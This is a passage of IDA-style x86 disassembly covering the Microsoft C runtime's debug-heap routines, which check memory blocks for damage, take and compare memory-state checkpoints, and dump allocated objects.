mov edx, [ebp+var_20]
cmp dword ptr [edx+14h], 3
jnz short loc_41D3A4
loc_41D38C: ; CODE XREF: sub_41D1D0+197�j
; sub_41D1D0+1A0�j ...
mov eax, [ebp+var_20]
mov ecx, [eax+14h]
and ecx, 0FFFFh
mov edx, ds:off_4517F0[ecx*4]
mov [ebp+var_2C], edx
jmp short loc_41D3AB
; ---------------------------------------------------------------------------
loc_41D3A4: ; CODE XREF: sub_41D1D0+1BA�j
mov [ebp+var_2C], offset aDamaged ; "DAMAGED"
loc_41D3AB: ; CODE XREF: sub_41D1D0+1D2�j
push 4
mov al, ds:byte_4517EC
push eax
mov ecx, [ebp+var_20]
add ecx, 1Ch
push ecx
call sub_41D140
add esp, 0Ch
test eax, eax
jnz short loc_41D400
loc_41D3C6: ; CODE XREF: sub_41D1D0+227�j
mov edx, [ebp+var_20]
add edx, 20h
push edx
mov eax, [ebp+var_20]
mov ecx, [eax+18h]
push ecx
mov edx, [ebp+var_2C]
push edx
push offset aDamageBeforeHs ; "DAMAGE: before %hs block (#%d) at 0x%08"...
push 0
push 0
push 0
push 0
call sub_422610
add esp, 20h
cmp eax, 1
jnz short loc_41D3F3
int 3 ; Trap to Debugger
loc_41D3F3: ; CODE XREF: sub_41D1D0+220�j
xor eax, eax
test eax, eax
jnz short loc_41D3C6
mov [ebp+var_28], 0
loc_41D400: ; CODE XREF: sub_41D1D0+1F4�j
push 4
mov cl, ds:byte_4517EC
push ecx
mov edx, [ebp+var_20]
mov eax, [edx+10h]
mov ecx, [ebp+var_20]
lea edx, [ecx+eax+20h]
push edx
call sub_41D140
add esp, 0Ch
test eax, eax
jnz short loc_41D45D
loc_41D423: ; CODE XREF: sub_41D1D0+284�j
mov eax, [ebp+var_20]
add eax, 20h
push eax
mov ecx, [ebp+var_20]
mov edx, [ecx+18h]
push edx
mov eax, [ebp+var_2C]
push eax
push offset aDamageAfterHsB ; "DAMAGE: after %hs block (#%d) at 0x%08X"...
push 0
push 0
push 0
push 0
call sub_422610
add esp, 20h
cmp eax, 1
jnz short loc_41D450
int 3 ; Trap to Debugger
loc_41D450: ; CODE XREF: sub_41D1D0+27D�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41D423
mov [ebp+var_28], 0
loc_41D45D: ; CODE XREF: sub_41D1D0+251�j
mov edx, [ebp+var_20]
cmp dword ptr [edx+14h], 0
jnz short loc_41D4B6
mov eax, [ebp+var_20]
mov ecx, [eax+10h]
push ecx
mov dl, ds:byte_4517ED
push edx
mov eax, [ebp+var_20]
add eax, 20h
push eax
call sub_41D140
add esp, 0Ch
test eax, eax
jnz short loc_41D4B6
loc_41D487: ; CODE XREF: sub_41D1D0+2DD�j
mov ecx, [ebp+var_20]
add ecx, 20h
push ecx
push offset aDamageOnTopOfF ; "DAMAGE: on top of Free block at 0x%08X."...
push 0
push 0
push 0
push 0
call sub_422610
add esp, 18h
cmp eax, 1
jnz short loc_41D4A9
int 3 ; Trap to Debugger
loc_41D4A9: ; CODE XREF: sub_41D1D0+2D6�j
xor edx, edx
test edx, edx
jnz short loc_41D487
mov [ebp+var_28], 0
loc_41D4B6: ; CODE XREF: sub_41D1D0+294�j
; sub_41D1D0+2B5�j
cmp [ebp+var_28], 0
jnz short loc_41D532
mov eax, [ebp+var_20]
cmp dword ptr [eax+8], 0
jz short loc_41D4F8
loc_41D4C5: ; CODE XREF: sub_41D1D0+326�j
mov ecx, [ebp+var_20]
mov edx, [ecx+0Ch]
push edx
mov eax, [ebp+var_20]
mov ecx, [eax+8]
push ecx
mov edx, [ebp+var_2C]
push edx
push offset aHsAllocatedAtF ; "%hs allocated at file %hs(%d).\n"
push 0
push 0
push 0
push 0
call sub_422610
add esp, 20h
cmp eax, 1
jnz short loc_41D4F2
int 3 ; Trap to Debugger
loc_41D4F2: ; CODE XREF: sub_41D1D0+31F�j
xor eax, eax
test eax, eax
jnz short loc_41D4C5
loc_41D4F8: ; CODE XREF: sub_41D1D0+2F3�j
; sub_41D1D0+359�j
mov ecx, [ebp+var_20]
mov edx, [ecx+10h]
push edx
mov eax, [ebp+var_20]
add eax, 20h
push eax
mov ecx, [ebp+var_2C]
push ecx
push offset aHsLocatedAt0x0 ; "%hs located at 0x%08X is %u bytes long."...
push 0
push 0
push 0
push 0
call sub_422610
add esp, 20h
cmp eax, 1
jnz short loc_41D525
int 3 ; Trap to Debugger
loc_41D525: ; CODE XREF: sub_41D1D0+352�j
xor edx, edx
test edx, edx
jnz short loc_41D4F8
mov [ebp+var_1C], 0
loc_41D532: ; CODE XREF: sub_41D1D0+2EA�j
jmp loc_41D33F
; ---------------------------------------------------------------------------
loc_41D537: ; CODE XREF: sub_41D1D0+159�j
; sub_41D1D0+17B�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_41D545
jmp short loc_41D550
sub_41D1D0 endp
; =============== S U B R O U T I N E =======================================
sub_41D545 proc near ; CODE XREF: sub_41D1D0+36E�p
; DATA XREF: _1:0043CAC8�o
push 9
call sub_423320
add esp, 4
retn
sub_41D545 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41D1D0
loc_41D550: ; CODE XREF: sub_41D1D0+373�j
mov eax, [ebp+var_1C]
loc_41D553: ; CODE XREF: sub_41D1D0+34�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_41D1D0
; ---------------------------------------------------------------------------
off_41D564 dd offset loc_41D2D4 ; DATA XREF: sub_41D1D0+82�r
dd offset loc_41D2AC
dd offset loc_41D284
dd offset loc_41D259
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D580 proc near ; CODE XREF: sub_41E920+A0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, ds:dword_4517E0
mov [ebp+var_4], eax
cmp [ebp+arg_0], 0FFFFFFFFh
jz short loc_41D59B
mov ecx, [ebp+arg_0]
mov ds:dword_4517E0, ecx
loc_41D59B: ; CODE XREF: sub_41D580+10�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_41D580 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43CAD0
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
mov eax, ds:dword_4517E0
and eax, 1
test eax, eax
jnz short loc_41D5E1
jmp short loc_41D648
; ---------------------------------------------------------------------------
loc_41D5E1: ; CODE XREF: _0:0041D5DD�j
push 9
call sub_423280
add esp, 4
mov dword ptr [ebp-4], 0
mov ecx, ds:dword_4F32E8
mov [ebp-1Ch], ecx
jmp short loc_41D605
; ---------------------------------------------------------------------------
loc_41D5FD: ; CODE XREF: _0:loc_41D62D�j
mov edx, [ebp-1Ch]
mov eax, [edx]
mov [ebp-1Ch], eax
loc_41D605: ; CODE XREF: _0:0041D5FB�j
cmp dword ptr [ebp-1Ch], 0
jz short loc_41D62F
mov ecx, [ebp-1Ch]
mov edx, [ecx+14h]
and edx, 0FFFFh
cmp edx, 4
jnz short loc_41D62D
mov eax, [ebp+0Ch]
push eax
mov ecx, [ebp-1Ch]
add ecx, 20h
push ecx
call dword ptr [ebp+8]
add esp, 8
loc_41D62D: ; CODE XREF: _0:0041D61A�j
jmp short loc_41D5FD
; ---------------------------------------------------------------------------
loc_41D62F: ; CODE XREF: _0:0041D609�j
mov dword ptr [ebp-4], 0FFFFFFFFh
call sub_41D63D
jmp short loc_41D648
; =============== S U B R O U T I N E =======================================
sub_41D63D proc near ; CODE XREF: _0:0041D636�p
; DATA XREF: _1:0043CAD8�o
push 9
call sub_423320
add esp, 4
retn
sub_41D63D endp
; ---------------------------------------------------------------------------
loc_41D648: ; CODE XREF: _0:0041D5DF�j _0:0041D63B�j
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D660 proc near ; CODE XREF: sub_41D6B0+1E�p
; _0:0041D870�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
jz short loc_41D69D
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call ds:dword_4F5470 ; IsBadReadPtr
test eax, eax
jnz short loc_41D69D
cmp [ebp+arg_8], 0
jz short loc_41D694
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call ds:dword_4F546C ; IsBadWritePtr
test eax, eax
jnz short loc_41D69D
loc_41D694: ; CODE XREF: sub_41D660+20�j
mov [ebp+var_4], 1
jmp short loc_41D6A4
; ---------------------------------------------------------------------------
loc_41D69D: ; CODE XREF: sub_41D660+8�j
; sub_41D660+1A�j ...
mov [ebp+var_4], 0
loc_41D6A4: ; CODE XREF: sub_41D660+3B�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_41D660 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D6B0 proc near ; CODE XREF: sub_41C3F0+1AA�p
; sub_41CA80+9C�p ...
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_0], 0
jnz short loc_41D6C3
xor eax, eax
jmp loc_41D7D0
; ---------------------------------------------------------------------------
loc_41D6C3: ; CODE XREF: sub_41D6B0+A�j
push 1
push 20h
mov eax, [ebp+arg_0]
sub eax, 20h
push eax
call sub_41D660
add esp, 0Ch
test eax, eax
jnz short loc_41D6E1
xor eax, eax
jmp loc_41D7D0
; ---------------------------------------------------------------------------
loc_41D6E1: ; CODE XREF: sub_41D6B0+28�j
cmp ds:dword_4F39EC, 3
jnz short loc_41D74E
mov ecx, [ebp+arg_0]
sub ecx, 20h
push ecx
call sub_4240F0
add esp, 4
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41D71A
mov edx, [ebp+arg_0]
sub edx, 20h
push edx
mov eax, [ebp+var_4]
push eax
call sub_424150
add esp, 8
jmp loc_41D7D0
; ---------------------------------------------------------------------------
loc_41D71A: ; CODE XREF: sub_41D6B0+50�j
mov ecx, ds:dword_4F32F8
and ecx, 8000h
test ecx, ecx
jz short loc_41D734
mov eax, 1
jmp loc_41D7D0
; ---------------------------------------------------------------------------
loc_41D734: ; CODE XREF: sub_41D6B0+78�j
mov edx, [ebp+arg_0]
sub edx, 20h
push edx
push 0
mov eax, ds:dword_4F39E8
push eax
call ds:dword_4F5474 ; HeapValidate
jmp loc_41D7D0
; ---------------------------------------------------------------------------
loc_41D74E: ; CODE XREF: sub_41D6B0+38�j
cmp ds:dword_4F39EC, 2
jnz short loc_41D7BA
lea ecx, [ebp+var_8]
push ecx
lea edx, [ebp+var_10]
push edx
mov eax, [ebp+arg_0]
sub eax, 20h
push eax
call sub_426110
add esp, 0Ch
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_41D78D
mov ecx, [ebp+var_C]
xor edx, edx
mov dl, [ecx]
test edx, edx
jz short loc_41D789
mov eax, 1
jmp short loc_41D7D0
; ---------------------------------------------------------------------------
loc_41D789: ; CODE XREF: sub_41D6B0+D0�j
xor eax, eax
jmp short loc_41D7D0
; ---------------------------------------------------------------------------
loc_41D78D: ; CODE XREF: sub_41D6B0+C5�j
mov eax, ds:dword_4F32F8
and eax, 8000h
test eax, eax
jz short loc_41D7A2
mov eax, 1
jmp short loc_41D7D0
; ---------------------------------------------------------------------------
loc_41D7A2: ; CODE XREF: sub_41D6B0+E9�j
mov ecx, [ebp+arg_0]
sub ecx, 20h
push ecx
push 0
mov edx, ds:dword_4F39E8
push edx
call ds:dword_4F5474 ; HeapValidate
jmp short loc_41D7D0
; ---------------------------------------------------------------------------
loc_41D7BA: ; CODE XREF: sub_41D6B0+A5�j
mov eax, [ebp+arg_0]
sub eax, 20h
push eax
push 0
mov ecx, ds:dword_4F39E8
push ecx
call ds:dword_4F5474 ; HeapValidate
loc_41D7D0: ; CODE XREF: sub_41D6B0+E�j
; sub_41D6B0+2C�j ...
mov esp, ebp
pop ebp
retn
sub_41D6B0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43CAE0
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF0h
push ebx
push esi
push edi
mov eax, [ebp+8]
push eax
call sub_41D6B0
add esp, 4
test eax, eax
jnz short loc_41D81A
xor eax, eax
jmp loc_41D8F4
; ---------------------------------------------------------------------------
loc_41D81A: ; CODE XREF: _0:0041D811�j
push 9
call sub_423280
add esp, 4
mov dword ptr [ebp-4], 0
mov ecx, [ebp+8]
sub ecx, 20h
mov [ebp-1Ch], ecx
mov edx, [ebp-1Ch]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 4
jz short loc_41D866
mov ecx, [ebp-1Ch]
cmp dword ptr [ecx+14h], 1
jz short loc_41D866
mov edx, [ebp-1Ch]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 2
jz short loc_41D866
mov ecx, [ebp-1Ch]
cmp dword ptr [ecx+14h], 3
jnz short loc_41D8D1
loc_41D866: ; CODE XREF: _0:0041D842�j _0:0041D84B�j ...
push 1
mov edx, [ebp+0Ch]
push edx
mov eax, [ebp+8]
push eax
call sub_41D660
add esp, 0Ch
test eax, eax
jz short loc_41D8D1
mov ecx, [ebp-1Ch]
mov edx, [ecx+10h]
cmp edx, [ebp+0Ch]
jnz short loc_41D8D1
mov eax, [ebp-1Ch]
mov ecx, [eax+18h]
cmp ecx, ds:dword_4517E4
jg short loc_41D8D1
cmp dword ptr [ebp+10h], 0
jz short loc_41D8A6
mov edx, [ebp+10h]
mov eax, [ebp-1Ch]
mov ecx, [eax+18h]
mov [edx], ecx
loc_41D8A6: ; CODE XREF: _0:0041D899�j
cmp dword ptr [ebp+14h], 0
jz short loc_41D8B7
mov edx, [ebp+14h]
mov eax, [ebp-1Ch]
mov ecx, [eax+8]
mov [edx], ecx
loc_41D8B7: ; CODE XREF: _0:0041D8AA�j
cmp dword ptr [ebp+18h], 0
jz short loc_41D8C8
mov edx, [ebp+18h]
mov eax, [ebp-1Ch]
mov ecx, [eax+0Ch]
mov [edx], ecx
loc_41D8C8: ; CODE XREF: _0:0041D8BB�j
mov dword ptr [ebp-20h], 1
jmp short loc_41D8D8
; ---------------------------------------------------------------------------
loc_41D8D1: ; CODE XREF: _0:0041D864�j _0:0041D87A�j ...
mov dword ptr [ebp-20h], 0
loc_41D8D8: ; CODE XREF: _0:0041D8CF�j
mov dword ptr [ebp-4], 0FFFFFFFFh
call sub_41D8E6
jmp short loc_41D8F1
; =============== S U B R O U T I N E =======================================
sub_41D8E6 proc near ; CODE XREF: _0:0041D8DF�p
; DATA XREF: _1:0043CAE8�o
push 9
call sub_423320
add esp, 4
retn
sub_41D8E6 endp
; ---------------------------------------------------------------------------
loc_41D8F1: ; CODE XREF: _0:0041D8E4�j
mov eax, [ebp-20h]
loc_41D8F4: ; CODE XREF: _0:0041D815�j
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, ds:dword_4F4A38
mov [ebp-4], eax
mov ecx, [ebp+8]
mov ds:dword_4F4A38, ecx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D930 proc near ; CODE XREF: sub_41E030+D�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041DAC3 SIZE 00000011 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43CB38
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF0h
push ebx
push esi
push edi
cmp [ebp+arg_0], 0
jnz short loc_41D984
loc_41D959: ; CODE XREF: sub_41D930+4D�j
push offset a_crtmemcheckpo ; "_CrtMemCheckPoint: NULL state pointer.\n"...
push offset aS_19 ; "%s"
push 0
push 0
push 0
push 0
call sub_422610
add esp, 18h
cmp eax, 1
jnz short loc_41D979
int 3 ; Trap to Debugger
loc_41D979: ; CODE XREF: sub_41D930+46�j
xor eax, eax
test eax, eax
jnz short loc_41D959
jmp loc_41DAC3
; ---------------------------------------------------------------------------
loc_41D984: ; CODE XREF: sub_41D930+27�j
push 9
call sub_423280
add esp, 4
mov [ebp+var_4], 0
mov ecx, [ebp+arg_0]
mov edx, ds:dword_4F32E8
mov [ecx], edx
mov [ebp+var_1C], 0
jmp short loc_41D9B2
; ---------------------------------------------------------------------------
loc_41D9A9: ; CODE XREF: sub_41D930+A4�j
mov eax, [ebp+var_1C]
add eax, 1
mov [ebp+var_1C], eax
loc_41D9B2: ; CODE XREF: sub_41D930+77�j
cmp [ebp+var_1C], 5
jge short loc_41D9D6
mov ecx, [ebp+var_1C]
mov edx, [ebp+arg_0]
mov dword ptr [edx+ecx*4+18h], 0
mov eax, [ebp+var_1C]
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+eax*4+4], 0
jmp short loc_41D9A9
; ---------------------------------------------------------------------------
loc_41D9D6: ; CODE XREF: sub_41D930+86�j
mov edx, ds:dword_4F32E8
mov [ebp+var_20], edx
jmp short loc_41D9E9
; ---------------------------------------------------------------------------
loc_41D9E1: ; CODE XREF: sub_41D930:loc_41DA8D�j
mov eax, [ebp+var_20]
mov ecx, [eax]
mov [ebp+var_20], ecx
loc_41D9E9: ; CODE XREF: sub_41D930+AF�j
cmp [ebp+var_20], 0
jz loc_41DA92
mov edx, [ebp+var_20]
mov eax, [edx+14h]
and eax, 0FFFFh
test eax, eax
jl short loc_41DA68
mov ecx, [ebp+var_20]
mov edx, [ecx+14h]
and edx, 0FFFFh
cmp edx, 5
jge short loc_41DA68
mov eax, [ebp+var_20]
mov ecx, [eax+14h]
and ecx, 0FFFFh
mov edx, [ebp+arg_0]
mov eax, [edx+ecx*4+4]
add eax, 1
mov ecx, [ebp+var_20]
mov edx, [ecx+14h]
and edx, 0FFFFh
mov ecx, [ebp+arg_0]
mov [ecx+edx*4+4], eax
mov edx, [ebp+var_20]
mov eax, [edx+14h]
and eax, 0FFFFh
mov ecx, [ebp+arg_0]
mov edx, [ecx+eax*4+18h]
mov eax, [ebp+var_20]
add edx, [eax+10h]
mov ecx, [ebp+var_20]
mov eax, [ecx+14h]
and eax, 0FFFFh
mov ecx, [ebp+arg_0]
mov [ecx+eax*4+18h], edx
jmp short loc_41DA8D
; ---------------------------------------------------------------------------
loc_41DA68: ; CODE XREF: sub_41D930+D0�j
; sub_41D930+E1�j ...
mov edx, [ebp+var_20]
push edx
push offset aBadMemoryBlock ; "Bad memory block found at 0x%08X.\n"
push 0
push 0
push 0
push 0
call sub_422610
add esp, 18h
cmp eax, 1
jnz short loc_41DA87
int 3 ; Trap to Debugger
loc_41DA87: ; CODE XREF: sub_41D930+154�j
xor eax, eax
test eax, eax
jnz short loc_41DA68
loc_41DA8D: ; CODE XREF: sub_41D930+136�j
jmp loc_41D9E1
; ---------------------------------------------------------------------------
loc_41DA92: ; CODE XREF: sub_41D930+BD�j
mov ecx, [ebp+arg_0]
mov edx, ds:dword_4F32F0
mov [ecx+2Ch], edx
mov eax, [ebp+arg_0]
mov ecx, ds:dword_4F32E4
mov [eax+30h], ecx
mov [ebp+var_4], 0FFFFFFFFh
call sub_41DAB8
jmp short loc_41DAC3
sub_41D930 endp
; =============== S U B R O U T I N E =======================================
sub_41DAB8 proc near ; CODE XREF: sub_41D930+181�p
; DATA XREF: _1:0043CB40�o
push 9
call sub_423320
add esp, 4
retn
sub_41DAB8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41D930
loc_41DAC3: ; CODE XREF: sub_41D930+4F�j
; sub_41D930+186�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_41D930
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
mov dword ptr [ebp-8], 0
cmp dword ptr [ebp+8], 0
jz short loc_41DB02
cmp dword ptr [ebp+0Ch], 0
jz short loc_41DB02
cmp dword ptr [ebp+10h], 0
jnz short loc_41DB30
loc_41DB02: ; CODE XREF: _0:0041DAF4�j _0:0041DAFA�j ...
push offset a_crtmemdiffere ; "_CrtMemDifference: NULL state pointer.\n"...
push offset aS_19 ; "%s"
push 0
push 0
push 0
push 0
call sub_422610
add esp, 18h
cmp eax, 1
jnz short loc_41DB22
int 3 ; Trap to Debugger
loc_41DB22: ; CODE XREF: _0:0041DB1F�j
xor eax, eax
test eax, eax
jnz short loc_41DB02
mov eax, [ebp-8]
jmp loc_41DBFC
; ---------------------------------------------------------------------------
loc_41DB30: ; CODE XREF: _0:0041DB00�j
mov dword ptr [ebp-4], 0
jmp short loc_41DB42
; ---------------------------------------------------------------------------
loc_41DB39: ; CODE XREF: _0:loc_41DBC7�j
mov ecx, [ebp-4]
add ecx, 1
mov [ebp-4], ecx
loc_41DB42: ; CODE XREF: _0:0041DB37�j
cmp dword ptr [ebp-4], 5
jge loc_41DBCC
mov edx, [ebp-4]
mov eax, [ebp+10h]
mov ecx, [ebp-4]
mov esi, [ebp+0Ch]
mov edx, [eax+edx*4+18h]
sub edx, [esi+ecx*4+18h]
mov eax, [ebp-4]
mov ecx, [ebp+8]
mov [ecx+eax*4+18h], edx
mov edx, [ebp-4]
mov eax, [ebp+10h]
mov ecx, [ebp-4]
mov esi, [ebp+0Ch]
mov edx, [eax+edx*4+4]
sub edx, [esi+ecx*4+4]
mov eax, [ebp-4]
mov ecx, [ebp+8]
mov [ecx+eax*4+4], edx
mov edx, [ebp-4]
mov eax, [ebp+8]
cmp dword ptr [eax+edx*4+18h], 0
jnz short loc_41DBA2
mov ecx, [ebp-4]
mov edx, [ebp+8]
cmp dword ptr [edx+ecx*4+4], 0
jz short loc_41DBC7
loc_41DBA2: ; CODE XREF: _0:0041DB93�j
cmp dword ptr [ebp-4], 0
jz short loc_41DBC7
cmp dword ptr [ebp-4], 2
jnz short loc_41DBC0
cmp dword ptr [ebp-4], 2
jnz short loc_41DBC7
mov eax, ds:dword_4517E0
and eax, 10h
test eax, eax
jz short loc_41DBC7
loc_41DBC0: ; CODE XREF: _0:0041DBAC�j
mov dword ptr [ebp-8], 1
loc_41DBC7: ; CODE XREF: _0:0041DBA0�j _0:0041DBA6�j ...
jmp loc_41DB39
; ---------------------------------------------------------------------------
loc_41DBCC: ; CODE XREF: _0:0041DB46�j
mov ecx, [ebp+10h]
mov edx, [ebp+0Ch]
mov eax, [ecx+2Ch]
sub eax, [edx+2Ch]
mov ecx, [ebp+8]
mov [ecx+2Ch], eax
mov edx, [ebp+10h]
mov eax, [ebp+0Ch]
mov ecx, [edx+30h]
sub ecx, [eax+30h]
mov edx, [ebp+8]
mov [edx+30h], ecx
mov eax, [ebp+8]
mov dword ptr [eax], 0
mov eax, [ebp-8]
loc_41DBFC: ; CODE XREF: _0:0041DB2B�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DC10 proc near ; CODE XREF: sub_41E030+5C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041DECC SIZE 00000037 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43CC50
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF0h
push ebx
push esi
push edi
mov [ebp+var_20], 0
push 9
call sub_423280
add esp, 4
mov [ebp+var_4], 0
loc_41DC4B: ; CODE XREF: sub_41DC10+5F�j
push offset aDumpingObjects ; "Dumping objects ->\n"
push offset aS_19 ; "%s"
push 0
push 0
push 0
push 0
call sub_422610
add esp, 18h
cmp eax, 1
jnz short loc_41DC6B
int 3 ; Trap to Debugger
loc_41DC6B: ; CODE XREF: sub_41DC10+58�j
xor eax, eax
test eax, eax
jnz short loc_41DC4B
cmp [ebp+arg_0], 0
jz short loc_41DC7F
mov ecx, [ebp+arg_0]
mov edx, [ecx]
mov [ebp+var_20], edx
loc_41DC7F: ; CODE XREF: sub_41DC10+65�j
mov eax, ds:dword_4F32E8
mov [ebp+var_1C], eax
jmp short loc_41DC91
; ---------------------------------------------------------------------------
loc_41DC89: ; CODE XREF: sub_41DC10:loc_41DEAE�j
mov ecx, [ebp+var_1C]
mov edx, [ecx]
mov [ebp+var_1C], edx
loc_41DC91: ; CODE XREF: sub_41DC10+77�j
cmp [ebp+var_1C], 0
jz loc_41DEB3
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_20]
jz loc_41DEB3
mov ecx, [ebp+var_1C]
mov edx, [ecx+14h]
and edx, 0FFFFh
cmp edx, 3
jz short loc_41DCE5
mov eax, [ebp+var_1C]
mov ecx, [eax+14h]
and ecx, 0FFFFh
test ecx, ecx
jz short loc_41DCE5
mov edx, [ebp+var_1C]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 2
jnz short loc_41DCEA
mov ecx, ds:dword_4517E0
and ecx, 10h
test ecx, ecx
jnz short loc_41DCEA
loc_41DCE5: ; CODE XREF: sub_41DC10+A6�j
; sub_41DC10+B6�j
jmp loc_41DEAE
; ---------------------------------------------------------------------------
loc_41DCEA: ; CODE XREF: sub_41DC10+C6�j
; sub_41DC10+D3�j
mov edx, [ebp+var_1C]
cmp dword ptr [edx+8], 0
jz short loc_41DD63
push 0
push 1
mov eax, [ebp+var_1C]
mov ecx, [eax+8]
push ecx
call sub_41D660
add esp, 0Ch
test eax, eax
jnz short loc_41DD34
loc_41DD0A: ; CODE XREF: sub_41DC10+120�j
mov edx, [ebp+var_1C]
mov eax, [edx+0Ch]
push eax
push offset aFileErrorD ; "#File Error#(%d) : "
push 0
push 0
push 0
push 0
call sub_422610
add esp, 18h
cmp eax, 1
jnz short loc_41DD2C
int 3 ; Trap to Debugger
loc_41DD2C: ; CODE XREF: sub_41DC10+119�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41DD0A
jmp short loc_41DD63
; ---------------------------------------------------------------------------
loc_41DD34: ; CODE XREF: sub_41DC10+F8�j
; sub_41DC10+151�j
mov edx, [ebp+var_1C]
mov eax, [edx+0Ch]
push eax
mov ecx, [ebp+var_1C]
mov edx, [ecx+8]
push edx
push offset aHsD ; "%hs(%d) : "
push 0
push 0
push 0
push 0
call sub_422610
add esp, 1Ch
cmp eax, 1
jnz short loc_41DD5D
int 3 ; Trap to Debugger
loc_41DD5D: ; CODE XREF: sub_41DC10+14A�j
xor eax, eax
test eax, eax
jnz short loc_41DD34
loc_41DD63: ; CODE XREF: sub_41DC10+E1�j
; sub_41DC10+122�j ...
mov ecx, [ebp+var_1C]
mov edx, [ecx+18h]
push edx
push offset aLd ; "{%ld} "
push 0
push 0
push 0
push 0
call sub_422610
add esp, 18h
cmp eax, 1
jnz short loc_41DD85
int 3 ; Trap to Debugger
loc_41DD85: ; CODE XREF: sub_41DC10+172�j
xor eax, eax
test eax, eax
jnz short loc_41DD63
mov ecx, [ebp+var_1C]
mov edx, [ecx+14h]
and edx, 0FFFFh
cmp edx, 4
jnz short loc_41DE0D
loc_41DD9C: ; CODE XREF: sub_41DC10+1C8�j
mov eax, [ebp+var_1C]
mov ecx, [eax+10h]
push ecx
mov edx, [ebp+var_1C]
mov eax, [edx+14h]
sar eax, 10h
and eax, 0FFFFh
push eax
mov ecx, [ebp+var_1C]
add ecx, 20h
push ecx
push offset aClientBlockAt0 ; "client block at 0x%08X, subtype %x, %u "...
push 0
push 0
push 0
push 0
call sub_422610
add esp, 20h
cmp eax, 1
jnz short loc_41DDD4
int 3 ; Trap to Debugger
loc_41DDD4: ; CODE XREF: sub_41DC10+1C1�j
xor edx, edx
test edx, edx
jnz short loc_41DD9C
cmp ds:dword_4F4A38, 0
jz short loc_41DDFC
mov eax, [ebp+var_1C]
mov ecx, [eax+10h]
push ecx
mov edx, [ebp+var_1C]
add edx, 20h
push edx
call ds:dword_4F4A38
add esp, 8
jmp short loc_41DE08
; ---------------------------------------------------------------------------
loc_41DDFC: ; CODE XREF: sub_41DC10+1D1�j
mov eax, [ebp+var_1C]
push eax
call sub_41DF10
add esp, 4
loc_41DE08: ; CODE XREF: sub_41DC10+1EA�j
jmp loc_41DEAE
; ---------------------------------------------------------------------------
loc_41DE0D: ; CODE XREF: sub_41DC10+18A�j
mov ecx, [ebp+var_1C]
cmp dword ptr [ecx+14h], 1
jnz short loc_41DE53
loc_41DE16: ; CODE XREF: sub_41DC10+233�j
mov edx, [ebp+var_1C]
mov eax, [edx+10h]
push eax
mov ecx, [ebp+var_1C]
add ecx, 20h
push ecx
push offset aNormalBlockAt0 ; "normal block at 0x%08X, %u bytes long.\n"...
push 0
push 0
push 0
push 0
call sub_422610
add esp, 1Ch
